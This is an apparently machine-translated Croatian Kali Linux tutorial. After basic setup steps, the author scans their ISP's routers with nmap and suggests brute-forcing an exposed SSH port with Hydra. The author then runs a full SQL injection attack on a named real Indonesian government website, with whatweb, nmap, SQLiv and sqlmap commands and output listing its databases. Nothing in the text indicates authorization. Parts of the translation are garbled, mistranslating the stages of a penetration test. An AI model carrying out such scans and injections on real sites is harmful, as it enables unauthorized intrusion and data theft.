Vodič za Kali Linux

Kali Linux Tutorial

Ako ste stručnjak ili barem upoznati s Linuxom, naredbama i okruženjem, upravo ste instalirali Kali Linux na svoj stroj, želite postati majstor Kali Linuxa ili etički haker, na pravom ste mjestu. U ovom ću članku pokriti Kali Linux vodič za korisnike Linuxa koji još nisu upoznati s Kalijem i upoznati vas s nekim od osnovnih tehnika koje se koriste za hakiranje i sigurnosno testiranje dok koristite Kali.

Što je Kali Linux?

Kali Linux, ( prvi put objavljeno 13. ožujka 2013 ) koji je formalno bio poznat kao BackTrack, a razvila ga je sigurnosna tvrtka Offensive Security, forenzička je i sigurnosno usmjerena distribucija temeljena na Debian-ovoj podružnici za testiranje. Kali Linux osmišljen je s obzirom na penetracijsko testiranje, oporavak podataka i otkrivanje prijetnji. Projekt je početkom ove godine prešao na model stalnog izdanja u nastojanju da korisnicima distribucije pruži više ažuriranih sigurnosnih programa. Kali Linux je besplatan i uvijek će biti. Uključuje 600+ alata za testiranje penetracije.



Zašto Kali Linux? Odgovara li vam?

Kali Linux nedavno je stekao veliku popularnost. I iza toga postoji razlog. Hakiranje se vratilo kao popularna stvar u popularnoj kulturi i to se može značajno pripisati TV seriji Gospodin Robot. Popularnost gospodina Robota pomogla je Kali Linuxu u pridobivanju novih korisnika. Ljudi koji slabo poznaju Linux ili bilo što vezano uz računalnu sigurnost sada pokušavaju koristiti Kali kao svoju glavnu distribuciju Linuxa.



Naša najnaprednija distribucija testiranja penetracije, ikad. - Kali Linux Developers. (Napisano je na glavnoj stranici Kali.org na samom vrhu stranice.) Što imate od te izjave? Primjećujete li ovo: APTD (Advanced Penetration Testing Distribution)? Ovdje doslovno nema hakiranja izraza. Kali Linux isti je kao i druge distribucije Linuxa. Jednostavno rečeno, to je distribucija Linuxa prepuna sigurnosnih alata i usmjerena na stručnjake za mrežnu i računalnu sigurnost. Međutim, uporaba Kali Linuxa fokusira se samo na sigurnost i forenziku.



Linux distribucija nije ništa drugo nego paket koji sadrži jezgru Linuxa, skup osnovnih uslužnih programa i aplikacija te neke zadane postavke. Dakle, Kali Linux ne nudi nešto jedinstveno u tom smislu većina ponuđenih alata mogla bi se instalirati na bilo koju Linux distribuciju.

Kali Linux posebno je prilagođen zahtjevima profesionalnog penetracijskog testiranja i sigurnosne revizije. Namijenjen je određenom podskupu korisnika Linuxa. Pentesteri, hakeri itd. Ne preporučuje se distribucija ako očekujete Kali za Linux opće namjene za razvoj, web dizajn, igre, ured itd. Kali bi vam mogla staviti neke izazove, čak i ako ste iskusni korisnik Linuxa .

STVARI KOJE MORATE UČINITI NAKON UGRADNJE KALI LINUX -a

Nakon što instalirate Kali Linux, možda ćete se zapitati što dalje s tim, zar ne ?. Svi se suočavaju s ovim problemom, ne brinite.



1. KORAK: POSTAVITE REPOZITORIJU

Prvo, možda ste to već znali, ali važno je ispravno postaviti spremište. Kao što sam rekao, Kali Linuxov model valjanog izdanja nastoji pružiti modernije sigurnosne pomoćne programe korisnicima distribucije. Općenito, ako ste nedavno instalirali Kali Linux, spremište upućuje na medije koje koristite za instalaciju. Da biste to riješili, morate promijeniti spremište u službeno spremište Kali Linux. Potrebna datoteka nalazi se ispod /etc/apt/sources.list . Otvorite datoteku s uređivačem teksta u ploči listova i zamijenite zadano spremište na ovo službeno spremište Kali Rolling:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

2. KORAK: AŽURIRAJTE I NADGRADITE SVOJ KALI LINUX

Nakon tog ažuriranja i nadogradnje sustava, sinkronizirajte svoj Kali Linux s najnovijom verzijom. Da biste to učinili, otvorite terminal i upišite:

apt update -y && apt upgrade -y && apt dist-upgrade 

Naredba apt update preuzima i dohvaća paket popis informacija iz spremišta i ažurira ih kako bi dobila informacije o najnovijim verzijama paketa i njihovim ovisnostima.

Naredba apt upgrade preuzima i instalira noviju verziju paketa instaliranih paketa Kali Linux sve dok nema pogrešaka na ovisnostima.

Apt dist-upgrade će bez obzira na sve ažurirati sve pakete na najnoviju dostupnu verziju. Također instalirajte i uklonite ovisnosti prema potrebi (instalirajte ovisnosti kako biste zadovoljili pakete, očito, ali i uklonite ovisnosti koje su ostale bez roditelja ako ažuriranom paketu više nije bila potrebna ovisnost.

OSNOVNI KONCEPT ISPITIVANJA PENETRACIJE S KALI LINUX -om

Nakon što ste uspješno izvršili te korake, tri su glavne stvari koje možete učiniti s Kali Linuxom na temelju ciljanog sustava, uključujući:

  1. Hakiranje bežične mreže - Wifi hakiranje, phishing, ARP trovanje itd.
  2. Hakiranje web aplikacija -Ubrizgavanje SQL-a, krivotvorenje zahtjeva na više web lokacija (CSRF), web phising itd.
  3. Hakiranje uređaja - Iskoristite ciljani stroj kako biste ovladali njime.

Ne računam hakiranje IoT -a, to ne znači da Kali Linux nema sposobnosti u tu svrhu. Ali, doslovno može pripadati i hakiranju uređaja. Budući da uređaj ima fizički izgled i oblik. U ovom vodiču pokrio sam osnovno znanje o njima. Budući da je Kali Linux ogroman, ne stane u jedan članak!

Također morate znati, ciklus ili postupak testiranja penetracije. Oni su:

  1. Rekognosciranje - prikupljanje informacija
  2. Skeniranje
  3. Operacija
  4. Poslije eksploatacije

BEZŽIČNE MREŽE HAKAJU S KALI LINUX -om

Što se tiče hakiranja bežične mreže, žrtva može varirati. Budući da se bežične mreže sastoje od nekoliko stvari, poput ISP -a (davatelja internetskih usluga), usmjerivača i njegovih partnera (modem, čvorište, prekidač itd.) I klijenata (korisnici, CCTV, udaljeno računalo itd.). Oni također imaju ranjive mogućnosti.

Internet je velika i složena grupa mrežnog hardvera, međusobno povezanih pristupnicima. Praćenje rute kojom slijede vaši paketi važno je kako biste znali kako dolazite do određenog naziva hosta ili ciljane IP adrese.

Kali Linux ima ugrađen alat pod nazivom Traceroute. Traceroute koristi vrijeme IP protokola za prikazivanje polja uživo i pokušava izvući ICMP TIME_EXCEEDED odgovor sa svakog pristupnika na putu do nekog hosta. Traceroute pokušaji praćenja rute koju bi IP paket slijedio do nekog internetskog domaćina pokretanjem paketa sonde s malim TTL -om (vrijeme života) zatim slušanjem ICMP -a premašilo je vrijeme odgovora na pristupniku. Dat ću vam i primjer kako pratiti Traceroute usmjerivač koji se koristi za upravljanje našom vezom.

1. Priznanje

Prikupljanje informacija najvažniji je početak, ne propustite ovaj korak. U ovom koraku naša je svrha pribaviti što je više moguće korisnih informacija koje bismo mogli dobiti, a zatim se ti podaci koriste za daljnje korake.

Prvo otvorite terminal i upišite ovu naredbu da biste započeli trasiranje puta do stranice, u ovom slučaju postavio sam web mjesto na google.com.

traceroute google.com 

Snimka zaslona Traceroute

2. Skeniranje

Nakon što pokrenemo naredbe, on će ispisati gdje naš paket ide u nizu. Kao što možete vidjeti gore, dobio sam 3 hopa, od kojih je jedan moj ISP poslužitelj. Prvi IP na popisu je moj usmjerivač, koji djeluje kao pristupnik. Sljedeća dva pripadaju mom ISP -u. Sada provjerimo uslugu koju koriste koristeći Nmap. Dakle, mete koje ćemo skenirati jesu 10.152.192.1 i 10.13.223.102 . Na terminalu sam pokrenuo sljedeću naredbu:

nmap -v -sS [IP Target] -Pn 

Razložimo argument naredbe:

-v = Omogući način detaljnosti

-sS = Koristite tehniku ​​skeniranja TCP SYN

-Pn = Tretirajte sve hostove kao online -preskočite otkrivanje hosta

I evo rezultata koji smo dobili.

snimka zaslona nmap 2

Nažalost, svi portovi su uključeni 10.152.192.1 filtrirane, to znači da su sve dolazne TCP veze blokirane IDS -om ili vatrozidom na ovom IP -u. Idemo sada ponovno skenirati drugu metu.

snimka zaslona nmap 1

3. Operacija

U ovom postupku ne namjeravam provoditi pravo iskorištavanje, već ću vam pokazati kako. Na temelju gornjeg rezultata skeniranja Nmap -a znamo da ovaj IP ima SSH poslužitelj pokrenut na priključku 22 i da je otvoren. Otvoreno je za bruteforsiranje, haha! Pronašli smo rupu, ovaj SSH poslužitelj je moguća rupa u koju bismo mogli pokušati pristupiti. U Kali Linuxu postoji nekoliko alata koji podržavaju bruteforce ili rječničke napade na SSH protokol. Najpopularniji i najsnažniji je Hydra.

U redu, to je bio osnovni postupak provođenja penetracijskog testa protiv ciljanog poslužitelja, što je u našem primjeru ovdje moj ISP poslužitelj.

MREŽNE APLIKACIJE HAKIRAJU KALI LINUX

Zapravo, ako ste strastveni u ovome, možete postaviti svoje hakersko okruženje instaliranjem DWVA (Prokleto ranjiva web aplikacija) u svoj Kali Linux. To je PHP/MySQL web aplikacija koja ima hrpu ranjivih rupa. Njezini glavni ciljevi su pomoći stručnjacima za sigurnost da provjere svoje vještine i alate u pravnom okruženju, te razvojnim programerima pomoći da bolje razumiju procese zaštite web aplikacija. DWVA možete besplatno preuzeti na Githubu ovdje: https://github.com/ethicalhack3r/DVWA.

Za sada ću vam pokazati kako se hakira web aplikacija na stvarnoj web stranici. Ali, obećajte mi, to je ograničeno samo na obrazovne svrhe. Simulirat ćemo pravi napad na stvarnu web lokaciju pomoću SQL injekcije.

Preduvjet

Pokriveni alati:

-Whatweb (unaprijed instaliran)

-Nmap (unaprijed instaliran)

- SQLiv (instalirajte ručno)

-SQLMap (unaprijed instaliran)

Potreban nam je još jedan dodatni alat koji je dostupan na Githubu ovdje: https://github.com/Hadesy2k/sqliv, prvo ga instalirajte na naš Kali Linux. Ovaj alat pod nazivom SQLiv koji je u mogućnosti izvršiti ciljano skeniranje pružanjem određene domene (s indeksiranjem). Upišite terminal:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Cilj: www.trenggalekkab.go.id

1. Priznanje

Prikupimo što je moguće više korisnih informacija. Mogli bismo otvoriti web stranicu i otkriti koja aplikacija radi na ovoj web stranici. Prvo provjerimo o kakvoj se web stranici radi. Za to ćemo koristiti whatweb.

whatweb www.trenggalekkab.go.id 

Kakav web screenshot

Kao što možete vidjeti gornji rezultat, cilj se nalazi u Indoneziji. Trči Apache v2.2.27 na svom web poslužitelju i također ima PHP v5.4.31 , ima IP adresu 103.247.21.142 . U redu, zabilježite to. Možda ćete morati posjetiti njezinu web stranicu, potražiti konstruiranu datoteku ili stranicu, parametre URL -a ili čak obrazac za prijavu. Za sada nam je potrebna ta IP adresa za sljedeći korak koji je skeniranje.

2. Skeniranje

Kao i prije, ponovno koristimo Nmap za skeniranje portova i usluga na cilju.

nmap -v -sS 103.247.21.142 

I evo rezultata koji smo dobili:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Postoji hrpa otvorenih portova koji upravljaju svakom uslugom na meti, ali privlači pažnju ta mysql usluga na portu 3306. Ukazano je da ova web stranica koristi mysql upravljati svojim podacima u bazama podataka. Zatim me zanima postoje li ranjivosti SQL Injection na ovoj web stranici. Dakle, ponovno skeniram web mjesto koristeći SQLiv koji smo upravo instalirali. Upisao sam naredbu:

sqliv -t www.trenggalekkab.go.id 

Snimka zaslona SQLHacking1

Na ovoj web stranici pronašli smo 2 moguća SQL osjetljiva URL -a. Zabilježite te URL -ove.

3. Operacija

U redu, imamo SQL ranjive URL -ove i spremni za izvođenje. Za to ćemo koristiti SQLMap. Sintaksa je:

sqlmap [Vulnerable URL] --dbs 

Naredba bi trebala izgledati ovako:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

Argument –dbs je reći SQLMap -u da dobije ciljne baze podataka. Evo rezultata koji smo dobili:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap je pronašao 2 baze podataka, ali samo jedna među njima koja sadrži osjetljive podatke, poput računa vjerodajnica administratora. To je na trengkab_trg. Nakon što smo pronašli baze podataka, postoji još jedan korak koji bismo trebali učiniti. To znači pronaći tablice i stupce, a posljednji korak je izbacivanje podataka. Ovdje u ovom odjeljku neću vam pokazati kako se koristi ovaj cilj. Barem znate osnovnu ideju o ciklusu napada i koristite neke alate.

HAKOVANJE UREĐAJA

U budućem članku na ovoj web stranici pokriti ćemo hakiranje uređaja, ostanite s nama. Kao upozorenje, pobrinite se da za to znate neki Python.